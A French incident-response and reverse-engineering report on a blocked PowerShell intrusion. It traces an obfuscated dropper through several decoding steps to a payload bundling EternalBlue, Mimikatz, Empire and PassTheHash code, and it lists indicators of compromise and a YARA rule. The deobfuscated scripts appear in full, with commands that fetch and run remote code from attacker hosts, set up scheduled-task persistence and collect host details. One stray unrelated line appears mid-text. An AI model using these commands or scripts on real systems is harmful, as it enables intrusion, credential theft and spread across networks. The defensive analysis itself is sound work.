Rapport de reverse

09 Mars 2021 - Antoine POURCEL



Découverte de l'attaque

La tentative de l'attaque à été découverte sur la console SentinelOne de l'entreprise. Elle à été automatiquement détecté comme malveillante par l'EDR avec les alertes suivantes et à donc été bloquée en conséquence :

Evasion

Suspicious SMB activity was detected.

MITRE: Discovery [T1135]

MITRE: Lateral Movement [T1077]

An obfuscated PowerShell command was detected.

MITRE: Defense Evasion [T1027]

Reconnaissance

Suspicious WMI query was identified.

MITRE : Execution [T1047] MITRE : Discovery [T1063]

Infostealer

Behaves like Mimikatz.

MITRE: Credential Access [T1098][T1145][T1081]

Identified read action of sensitive information from LSASS.

MITRE: Credential Access [T1003]

Attempts to read sensitive information from LSASS.

MITRE : Credential Access [T1003]

Post Exploitation

PowerShell post-exploitation script was executed.

MITRE: Execution [T1064][T1086]

General

Powershell execution policy was changed.

MITRE: Execution [T1086]

Persistence

Application registered itself to become persistent via scheduled task.

MITRE : Persistence [T1053]

Application registered itself to become persistent via service.

MITRE : Persistence [T1050]

La commande qui a initiée l'attaque à également été détectée:cmd /C "netsh.exe firewall add portopening tcp 65353 DNS&netsh interface portproxy add v4tov4 listenport=65353 connectaddress=1.1.1.1 connectport=53&schtasks /create /ru system /sc MINUTE /mo 40 /st 07:00:00 /tn Sync /tr "powershell -nop -ep bypass -e SQBFAFgAIAAOAE4AZQB3ACOATwBiAGOAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABPAGUAbgBOACKA LgBkAG8AdwBuAGwAbwBhAGQAcwBOAHIAaQBuAGcAKAAnAGgAdABOAHAAOgAvAC8AcAAuAGUAcwBOAG8A bgBpAG4AZQAuAGMAbwBtAC8AcAA/AHMAbQBiACCAKQA=" /F &schtasks /run /tn Sync"

On peut y remarquer un ajout de règle de pare-feu pour l'écoute du port 65353 avec netsh. exe servant pour une redirection DNS sur l'IP 1.1.1.1 et le port 53. Une planification de l'execution d'une commande en powershell est crée avec le nom Sync. Cette commande est encodée en base64.

Actions lancées par le maliciel

- Vol de mot de passe
- Agent de Contrôle
- Scan de l'ouverture du port SMB(445) sur les postes du réseau local
- Propagation par PassTheHash et MS17-010

Indices de compromission

- Ouverture du port 65353
- Redirection DNS du port 65353 sur 1.1.1.1:53
- Tache planifié nommé Sync
- Tache planifié nommé Winnet
- URL contactées:

URL	Fonction
hxxp://pslog.estonine.com	Téléchargement du dropper
hxxp://p.estonine.com	Téléchargement du dropper
hxxps://api.ipify.org	Téléchargement de chaine de caractère (Fermé)
hxxp://188.166.162.201/update.png	Téléchargement du maliciel

• Fichiers crées puis supprimés au chemins suivants :

Nom	Chemin
ccc.log	\$env:temp
sign.txt	\$env:appdata
flashplayer.tmp	\$env:appdata
FlashPlayer.lnk	\$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\

• Fichiers crées :

Nom(s)	SHA1	Poids	Fonctions
update.png	a31ffd5d09ebc00e0aec67634db4145455f62aee	2.3Mo	Contient le code malveillant
p?smb, p?hig, p?low	ba7c17d7804b28a3a0b0e576492c38e37f0b3cd1	2259 octets	Déploiement du maliciel

Le code attaquant est identique en tout point à celui étudié par JohnHammond et est disponible sur sa page GitHub. Son analyse à été publié le 6 mars 2021, 3 jours avant la rédaction de ce rapport. linux-headers-5.10.0-0.bpo.3-amd64

Décodage de la commande

Step 1

Dans une console IPython, nous décodons la ligne de commande powershell :

```
a =
'SQBFAFgAIAAoAE4AZQB3ACOATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbg
BOACkALgBkAG8AdwBuAGwAbwBhAGQAcwBOAHIAaQBuAGcAKAAnAGgAdABOAHAAOgAvAC8AcAAuA
GUAcwBOAG8AbgBpAG4AZQAuAGMAbwBtAC8AcAA/AHMAbQBiACcAKQA='
import base64
base64.b64decode(a).decode('utf-16-le')

> Out[5]: "IEX (New-Object
Net.WebClient).downloadstring('http://p.estonine.com/p?smb')"
```

Comprenant que cette commande procède au téléchargement ainsi qu'à l'éxécution d'un script distant, nous procédons à la récupération et analyse de celui-ci.

Step 2

Le fichier obtenu est un script PowerShell de 2259 octets et de SHA1 ba7c17d7804b28a3a0b0e576492c38e37f0b3cd1

Il consiste en une payload encodée en base64 qui est ensuite décompressé puis chargée en mémoire :

Invoke-Expression \$(New-Object IO.StreamReader (\$(New-Object IO.Compression.DeflateStream (\$(New-Object IO.MemoryStream (,\$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7M GIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe60510J/ff/z9cZmQBbPb0StrJn iGAqsgfP358Hz8iiheX1e91up2/W706ff36rHqxlW5t//SXxfJ7r/KL/N33Hz36Intz8u3TZuuj 0x+/+/iT7+/c+17+RTV//fJ3++T7+9/LF19+u3n5u6Vb6S9Mfya98+m979fZ/0R7o4/nV+8+zk+ 0n7/M6+1076H5ePoTX3ycntLnq9NX0+003d/b1a/u3P9Ufvvk/gP9ZXdHv9xyb+zbHk4+3f84TU OfD+3nFy8vP7Yfp+mdj3/j5Dd0ZsWKMErLsniLP+/c2dkbj3e30naaf/zJxz89qdr1allsp4tqt szq7Ta/2EpX9E2elw39wDu/5BfPp202/SXye96U+S/5Mfx0eDSrZUXg6be0bYrn7TJfrC/q4+00 f5ePZ4tpOm+zl3lZPNtOmyafVvXL7bbO2tf8PuFLL9K/6Scp/XJH/qY/rvO3wJk//YWXv8fFcjX 022y2Wt/dJez3Pt0df0r/PzjYvXv30apt5/IWYBHGLy+3LpZF3QL7WVaVy6tqNr5DmBXlyST/7r jNX2DwPz35cvsqp0n/vU/P5P000ukU0Ger60m6yrfTZT6bFfP0ajtdVcttomc+b+r8qlql07to/ VmqtOCh/eI7O+kvorfm7cUyL8fLdU3fbJ0Xhm5uSHh3Wect0Wk7ZcRfbxN6Zf46Pf698jRfFiVN zGJRTVMaEH/T8DdKz99/796y+K60qFh8l2bwc0JGehRcrutWp/6emfqfJliRqadPafYx9XjBzrY i3eZL6ooRbu+ih7tp87bJ2vkUtP6F3JlwhuGYHzPjnRI/TJtBTiEwBIEhGY6hv3tMY7jm2V1MEL Wwk5XPqukEPJMHk+ZmqT/F+KSmccioeEj399NqcTc9ffPVi7Mv0mlzN6U5ymszwRqEdcrjEFzuN Hl7/QRTKz03/ykaNNmT6s2jR99v6/xyWZ3QJ9+jtw2K+mb7Ln+DFxkCzdkY3xfLr+q9qkW/L0/H aDNe5G1z/RoQTGeWqk5i2pkIDPVFH1xV5e+xuttCipfj5YymYj4dLyEPU5WYCysl7yEin6WK9I9 ZvtLfnE64zcwDr3Dyg5m/YdpvmHMC3pl2+qQv3DLz9NWGyWfKNyn4vMcHIRNAMjt80GGCgA0oec gEYJpvlA8w1mLumAADFT6g38AShg98hamsAD7pcwPg3J4h7rTFos5Xc3rL6T2a2/M0X1230IsZm yUa1BlA6ls0DmKl7BnmCerzIivPRXEyC9BfRHo7ws9ev4TekZGffnH8ggz5V48ul16L0m/W2mBZ ZIvq6fi0zGqdk/Ijpcrq8ypUn1v6Mr8x09cVFf1qD3/qN3m9FmPaFvNpffz6S/SBP2m6iLBtRoT 48venDyKaeuuTk0/pm/3P2mICcJ8sq4Jwu1Q0vfflZeLz8oR5vAeG8JV3Gc5lRsjyp5cZfzDNFu YT+lVmT+wscyJ9UFfUFUnosljMjgWt9Pt5Wb1anrVlsX7SkJYgHMZltiqmxDAvx9dtUa+n+evvb Umz5mx8584WcU5dr08ILeJhakJ/z842vPx9+9mmHlJwmzCVoGxYCD8J1+2WxILa6Dx9H9aBufp7 xuRW5XhKz098Qf9bEXmVU4QUCk01zWz2xRfX1+DCNlvUFWkkUgBP1bRCpGba1io8+ozN5B30a/n 0++cQm/p7o3yRQQTp//TpKF/Xrfy6lb7L2/UXY4g6aZi5EXNP/YroNMp+MkCBbp2o09/79PVLGl WZTaryc6BNymaRLU0b6wGcHH+Rkq1fvSPZ4h4q8TUacijwXQ10CZFvb6eXzcn2oqqfqf6Cy7FL+ rsuzrfT3XRVvH2tIL5Ud4Ua0Ns/+fok/ZIUNfEYu5Kf4TdQQifj462tj9LRx+0P6Z/67PN5++bL 8vRZ+/GdlP77jZP/Bw==')))), [I0.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Step 3

Afin de gagner en temps, nous procédons au décodage de le Payload simplement en copiant le script dans une console PowerShell tout en retirant l'instruction Invoke-Expression. En procédant ainsi, nous obetnu le retour suivant :

```
C64spnohwxC64 tsiLtnemugrA- exe.dmc htaPeliF- ssecorP-tratS
gPvC64gPv + C64)gPvC64 + yekhwx + C64&v?
gnp.etadpu/102.261.661.881//:ptthC64 +
C64g'+'Pv(gnirts'+'daolnwod.)tneilCbeW.teN tcejbO-weN( XEIC64 + gPvC64gPv +
C64 c- ssapyb pe- neddih w- pon- lle
hsrewop c/C64 = spnohwx
{)0 qe- htgnel.nurhwx(fi
C64gnp.etadpuC64 nrettaP- gnirtS-tceleS AKe enildnammoc '+'tceles AKe
ssecorP_23niW tcejb0imW-teG = nurhwx
{yrt
))03..1( tcej'+'botupni- modnar-teg'+'( peels
}{esle}
C64tenniWC64 nt/ nur/ sksathcs'+'&
}
}{hctac}
C64cexecshwxC64 tsiLtnemugrA- exe.sks'+'athcs htaPeli'+'F- ssecorP-tratS
gPvF/ C64'+'gPv + C64edocbhwx e- ssapyb pe- llehsrewopC64 + gPvC64gPv + C64
rt/ tenniW nt/ 54 om/ ETUNIM cs/ etaerc/C64 = cexe'+'cshwx
)setyBhwx(gnirtS46e'+'saBoT::]trevnoC'+'[ = edocbhwx
)txeThwx(setyBteG.edocinU::]gnidocnE.txeT.metsyS[ = setyBhwx
C64)gPvC64 + tdhwx + '+'C64wol?
p/t'+'en.ndctahc.n'+'dc//:ptthgPv(gnirtsdaolnwod.)tneilCbeW.teN tcejb0-weN(
XEIC64 = txeThwx
{yrt
{esle}
}{hctac}
C64cexecshwxC64 tsiLtn'+'emugrA- exe.sksathcs htaPeliF- ssecorP-tratS
gPvF/ C64gPv + C64edocbhwx e- ssapyb pe-'+' llehsrewopC64 '+'+ gPvC64gPv +
C64 rt/ te'+'nniW nt/ 54 om/ ETUNIM cs/ metsys ur/ etaerc/C64 = cexecshwx
)se'+'tyBhwx(gnirtS46esaBoT::]trevnoC[ = edocbhwx
                                                        'e ouverture du
port txeThwx
```

```
{yrt
{)timreph'+'wx(fi
elif epyt- htaphwx metI-weN
{)gPveslaFgPv qe- galfhwx(fi
qalfexehwx + C64=SP'+'&C64 + EMANRESU:vnehwx + C64=resu&C64 +
niamoD.)metsysretupmoc_23niw tcejb0imW-teG( + C64=niamod&C64 + galfhwx +
C64=2galf&C64 + erutce'+'tihcrAS0.)me'+'tsySgnitarep0_'+
'23niW tcejb0imW-teG(+C6'+'4=tib&C64+noisrev.)metsySgnitarep0_23niW ssalC-
'+' tcejb0imW-teG(+C64=noisrev&C64+vahwx+C64=va&C64+camhwx+C64=camC64 =
yekhwx
)C64rotartsinimdAC6'+'4 ]eloRnItliuBswodniW.lapicnirP.ytiruceS[(eloRnIsI.))
(tnerruCteG::]ytitnedIswodniW.lapicnirP.ytiruceS[]lapicnirPswodniW.lapicnir
P.ytiruceS[( = timrephwx
htaphwx htap'+'-tset = galfhwx]'+'gnirts[
C64gol.ccccQMcQMpmet:vnehwxC64 = htaphwx
gPvddMMyygPv tamroF- etaD-teG = t'+'dhwx
}{hctac'+'}
)'+'galfexehwx]f'+'er[,ema'+'n'+'hwx,eurt'+'hwx( xetuM.gnidaerhT.metsyS
tcejb0-weN
esalfhwx = galfexehwx
gPvCEXESPcQMlabolGgPv = emanhwx
{yrt
)CAM dnapxe- tcejbo-tcelesAKeCAM r'+'edaeH- vsC-morFtrevnoC AKe1 tsrif- 1
pikS- tcejb0-tceleSAKe'+'VSC OF/ camteg( = camhwx]gnirts['((" ,'.'
,'rIGhtTOlEFt') ) )
```

Step 4

Comme précédamment, nous obtenons une déclaration en mémoire de foncitons qui ne sont cette fois plus encodée en base64, mais obfusquées avec une lecture de droite à gauche (cf dernière ligne du code). Nous procédons comme pour l'étape précédente, en faisant s'executer ce code en remplaçant l'instruction invoke-Expression par \$ afin de faire s'afficher le code en clair dans le descripteur de commande PowerShell. Nous obtenons le résultat suivant :

```
(('[string]xwhmac = (getmac /FO CSV'+'eKASelect-Object -Skip 1 -first 1eKA
ConvertFrom-Csv -Heade'+'r MACeKAselect-object -expand MAC)try{
```

```
xwhname = vPgGlobalMQcPSEXECvPg xwhexeflag = xwhflase New-Object
System.Threading.Mutex (xwh'+'true,xwh'+'n'+'ame,[re'+
'f]xwhexeflag'+')}'+'catch{}xwhd'+'t = Get-Date -Format vPgyyMMddvPgxwhpath
= 46Cxwhenv:tempMQcMQcccc.log46C[string'+']xwhflag = test-'+'path
xwhpathxwhpermit = ([Security.Principal.WindowsPrincipal]
[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRo
le([Security.Principal.WindowsBuiltInRole] 4'+'6CAdministrator46C)xwhkey =
46Cmac=2,3Mo et est de SHA1
a31ffd5d09ebc00e0aec67634db4145455f62aee46C+xwhmac+46C&av=46C+xwhav+46C&ver
sion=46C+(Get-WmiObject '+'-Class
Win32_OperatingSystem).version+46C&bit=4'+'6C+(Get-WmiObject
Win32'+'_OperatingSyst'+'em).OSArchit'+'ecture
 + 46C&flag2=46C + xwhflag + 46C&domain=46C + (Get-WmiObject
win32_computersystem).Domain + 46C&user=46C + xwhenv:USERNAME +
46C&'+'PS=46C + xwhexeflagif(xwhflag -eq vPgFalsevPg){
                                                         New-Item xwhpath
-type file if(xw'+'hpermit){ try{
                                                   xwhText = 46CIEX (New-
0bj
e'+'ct
Net.WebClient).d'+'ownloadstring(vP'+'ghttp://cdn.'+'chatcdn'+'.ne'+'t/p?
hig46C + xwhdt + 46CvPg)46C
                                        xwhBytes =
[System.Text.Encoding]::Unicode.GetBytes'+'(xwhText) '+'
[Convert]::ToBase64String(xwhByt'+'es)
                                                 xwhscexec = 46C/create
/ru sys
tem /sc MINUTE /mo 45 /tn Winn'+'et /tr 46C + vPg46CvPg +'+' 46Cpowershell
'+'-ep bypass -e xwhbcode46C + vPq46C /FvPq
                                                    Start-Process -
FilePath schtasks.exe -Argume'+'ntList 46Cxwhscexec46C
                                                                 }catch{}
                            xwhText = 46CIEX (New-Object Net.WebClient).
downloadstring(vPghttp://cd'+'n.chatcdn.ne'+'t/p?low46C'+' + xwhdt +
46CvPg)46C
                  xwhBytes =
[System.Text.Encoding]::Unicode.GetBytes(xwhText)
                                                            xwhbcode =
['+'Convert]::ToBas'+'e64String(xwhBytes)
                                                     xwhsc'+'exec =
46C/create /sc MINUTE /mo 45 /tn Winnet /tr 46
C + vPg46CvPg + 46Cpowershell -ep bypass -e xwhbcode46C + vPg'+'46C /FvPg
Start-Process -F'+'ilePath schta'+'sks.exe -ArgumentList 46Cxwhscexec46C
               }
                       &'+'schtasks /run /tn 46CWinnet46C}else{}sleep
('+'get-random -inputob'+'ject (1..30))try{ xwhrun
= Get-WmiObject Win32_Process eKA select'+' commandline eKA Select-String -
Pattern 46Cupdate.png46C
                           if(xwhrun.length -eq 0){
46C/c powershell -nop -w hidden -ep bypass -c 46C + vPg46CvPg + 46CIEX
(New-Object Net.WebClient).download'+'string(vP'+'g4
6C + 46Chttp://188.166.162.201/update.png?v&46C + xwhkey + 46CvPg)46C +
                Start-Process -FilePath cmd.exe -ArgumentList 46Cxwhonps46C
vPg46CvPg
}else{}}catch{}'+'slee'+'p (get-random -inputobj'+'ect (1..20))kill
xwhpid') -rePLACe 'vPg',[Char]39-rePLACe '46C'
,[Char]34 -cREpLACE([Char]101+[Char]75+[Char]65),[Char]124 -cREpLACE
'MQc',[Char]92 -rePLACe'xwh',[Char]36) | & ( $PsHOme[4]+$PShoMe[30]+'x')
```

Nous remarquons facilement qu'il s'agit d'un script toujours obfusqué avec des fonctions de décodage, puis d'execution en fin de script (-rePLACe 'vPg', [Char]39-rePLACe '46C', [Char]34 - cREpLACE([Char]101+[Char]75+[Char]65), [Char]124 -cREpLACE 'MQc', [Char]92 - rePLACe'xwh', [Char]36) | & (\$PsHOme[4]+\$PShoMe[30]+'x'))

Nous remplaçons \$PsHOme[4]+\$PShoMe[30]+'x' (qui correspond à l'instruction en PowerShell iex) par l'instruction Out-File output.txt afin d'obtenir un script en clair que voici:

```
(('
    [string]$mac = (getmac /FO CSV|Select-Object -Skip 1 -first 1|
ConvertFrom-Csv -Header MAC|select-object -expand MAC)
    $name = 'Global\PSEXEC'
    $exeflag = $flase
    New-Object System.Threading.Mutex ($true, $name, [ref]$exeflag)}catch{}
    $dt = Get-Date -Format 'yyMMdd'
    $path = "$env:temp\\ccc.log"
    [string]$flag = test-path $path
    $permit = ([Security.Principal.WindowsPrincipal]
[Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Prin
cipal.WindowsBuiltInRole] "Administrator")
    $key = "mac="+$mac+"&av="+$av+"&version="+(Get-WmiObject -Class
Win32_OperatingSystem).version+"&bit="+(Get-WmiObject
Win32_OperatingSystem).OSArchitecture + "&flag2=" + $flag + "&domain=" +
(Get-WmiObject win32_computersystem).Domain + "&user=" + $env:USERNAME +
"&PS=" + $exeflagif($flag -eq 'False'){
     New-Item $path -type file if($permit){
         try{
            $Text = "IEX (New-Object
Net.WebClient).downloadstring('http://cdn.chatcdn.net/p?hig" + $dt + "')"
            $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
            $bcode = [Convert]::ToBase64String($Bytes)
            $scexec = "/create /ru system /sc MINUTE /mo 45 /tn Winnet /tr
" + '"' + "powershell -ep bypass -e $bcode" + '" /F'
            Start-Process -FilePath schtasks.exe -ArgumentList "$scexec"
        }catch{}
    }else{
        try{
            $Text = "IEX (New-Object
Net.WebClient).downloadstring('http://cdn.chatcdn.net/p?low" + $dt + "')"
            $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
            $bcode = [Convert]::ToBase64String($Bytes)
            $scexec = "/create /sc MINUTE /mo 45 /tn Winnet /tr " + '"' +
"powershell -ep bypass -e $bcode" + '" /F'
            Start-Process -FilePath schtasks.exe -ArgumentList "$scexec"
        }catch{}
    }
    &schtasks /run /tn "Winnet"
    }else{
    }sleep (get-random -inputobject (1..30))
    try{
        $run = Get-WmiObject Win32_Process | select commandline | Select-
String -Pattern "update.png"
    if($run.length -eq 0){
        $onps = "/c powershell -nop -w hidden -ep bypass -c " + '"' + "IEX
(New-Object
```

Ce script, après la déclaration de quelques variables, va tester les droits de l'utilisateur courant et va effectuer le téléchargement d'une chaine de caractère depuis le domaine hxxp://cdn.chatcdn.net. Le chemin va différer selon les droits de l'utilisateur. Si il est Administrateur, le chemin sera /p?hig suivis de la date (avec le format yyMMdd), dans le cas contraire, le chemin de l'URL sera /p?low (toujours suivis de la date). La chaine de caractère téléchargé est ensuite planifié pour une execution avec powershell. Cette planification est nommé Winnet

Il s'avère que les deux fichiers sont identiques entre eux, et identiques avec le fichier téléchargement au début du reverse (SHA1 : ba7c17d7804b28a3a0b0e576492c38e37f0b3cd1 et 2259 octets)

Le script poursuit avec le téléchargement et l'execution d'une autre chaine de caractère depuis une IP. La chaine de caractère est présente dans un fichier nommé update.png. Après téléchargement de celui ci, nous constantons qu'il fait 2,3Mo et est de SHA1 a31ffd5d09ebc00e0aec67634db4145455f62aee.

On remarque également la création d'un fichier ccc . Log dans le dossier Temp de l'environnement.

Step 5

Le script contenu fonctionne de la même manière que psmb. Il s'agit du déchiffrement puis de la décompression d'une charge utile encodé en base 64 :

```
Invoke-Expression $(New-Object IO.StreamReader ($(New-Object
IO.Compression.DeflateStream ($(New-Object IO.MemoryStream
(,$([Convert]::FromBase64String('7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7M
GIzeaS7B1pRyMpqyqB
[...]
Xr1/mJ9/bH+3eH+3d//72d74sXnz88Z3fOPl/AA==')))),
[IO.Compression.CompressionMode]::Decompress)),
[Text.Encoding]::ASCII)).ReadToEnd();
```

Nous procédons donc comme précédemment pour décoder la charge utile. Le résultat obtenu semble être du code en clair, mais des instruction de désobfuscation en fin de scripts sont remarquables :

```
-CREpLaCE([cHaR]111+[cHaR]86+[cHaR]105+[cHaR]75+[cHaR]121),[cHaR]124 - rEPlaCE'`',[cHaR]96-rEPlaCE ''',[cHaR]39 -CREpLaCE'\',[cHaR]92 -rEPlaCE '"',[cHaR]34-CREpLaCE '$',[cHaR]36)|&( $eNV:COmSPeC[4,15,25]-JOiN'')
```

Remarquant que l'instruction \$eNV: COmSPeC[4, 15, 25] correspond à l'instruction iex, nous la retirons, et la remplacons par un Out-File update_png_clear obtenir un fichier conpletement clair.

Analyse du code

Vu la rédaction de nom de fonction qui diffère le long du code, de la présence ou non de commentaires, il est vraisemblable que l'attaquant ait récupéré des codes déjà existants. Il a pu être trouvé des codes de Mimikatz, d'agents Empire et d'impacket.

EternalBlue / CobalStrike

La structure du code présent de la ligne 1 à la ligne 795 correspond à celle d'un code PowerShell disponible publiquement (ici) permettant l'exploitation de failles EternalBlue.

Scan local

Un code ligne 1126 permet de scanner des IP locales pour déterminer l'ouverture du port SAMBA (445).

GatherHashes

Le code présent de la ligne 1222 jusqu'à la ligne 1629 est une copie du code présent ici Il permet la récupération d'identifiants depuis la base SAM.

Mimikatz - Empire

Le code débutant à la ligne 1631 jusqu'a la ligne 4311 est similaire au code Invoke-Mimikatz publiquement disponible ici. Seuls des nom de fonctions sont modifié en guise d'obfuscation. De plus, cette règle Yara est déclenchée à la ligne 2783. Elle permet de détecter des injections d'executables en mémoire. Elle est écrite et publié par Benjamin DELPY, le créateur de Mimikatz. Il est donc vraisemblable que le code déclenchant cette règle provienne de Mimikatz.

La règle Yara ci dessous est déclenchée en ligne 3480. Elle permet de détecter la génération d'un agent depuis le framework Empire-Powershell. Il est à supposer que le code déclenchant cette règle provient d'un Agent Empire.

```
rule Empire_PowerShell_Framework_Gen1 {
  meta:
     description = "Detects Empire component"
      license = "https://creativecommons.org/licenses/by-nc/4.0/"
     author = "Florian Roth"
      reference = "https://github.com/adaptivethreat/Empire"
     date = "2016-11-05"
     super_rule = 1
     hash1 =
"1be3e3ec0e364db0c00fad2c59c7041e23af4dd59c4cc7dc9dcf46ca507cd6c8"
      hash2 =
"a3428a7d4f9e677623fadff61b2a37d93461123535755ab0f296aa3b0396eb28"
      hash3 =
"4725a57a5f8b717ce316f104e9472e003964f8eae41a67fd8c16b4228e3d00b3"
      hash4 =
"61e5ca9c1e8759a78e2c2764169b425b673b500facaca43a26c69ff7e09f62c4"
```

```
hash5 =
"eaff29dd0da4ac258d85ecf8b042d73edb01b4db48c68bded2a8b8418dc688b5"
    strings:
        $s1 = "Write-BytesToMemory -Bytes $Shellcode" ascii
        $s2 = "$GetCommandLineAAddrTemp = Add-SignedIntAsUnsigned
$GetCommandLineAAddrTemp ($Shellcode1.Length)" fullword ascii
        condition:
        ( uint16(0) == 0x7566 and filesize < 4000KB and 1 of them ) or all of
them
}</pre>
```

Ces deux informations peuvent nous amener à croire que cette partie du code provient d'un agent Mimikatz produit grâce au Framework Empire PowerShell

PassTheHash

Le code à partir de la ligne 4313 jusqu'à la ligne 7202 est une copie du code disponible ici

Le code à partir de la ligne 7204 jusqu'à la ligne 10044 est une copie du code disponible ici

Ces deux codes sont utilisés pour l'utilisation de vulnérabilités PassTheHash via le protocole SMB.

Code executant

Le reste du code consiste en l'éxécution des précédantes librairies déclarées. On y retrouve la ligne de commande détecté par SentinelOne lors de la découverte de l'attaque, des url de téléchargement des fichiers précédamment analysées ainsi que le déclaration de hash et de mot de passe simple permettant à l'attaquant de mener des tentatives d'authentifications par dictionnaire. On remarque également des créations suivis de suppressions de fichiers aux chemins suivants :

- \AppData\Roaming\sign.txt
- \AppData\Roaming\flashplayer.tmp
- \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FlashPlayer.lnk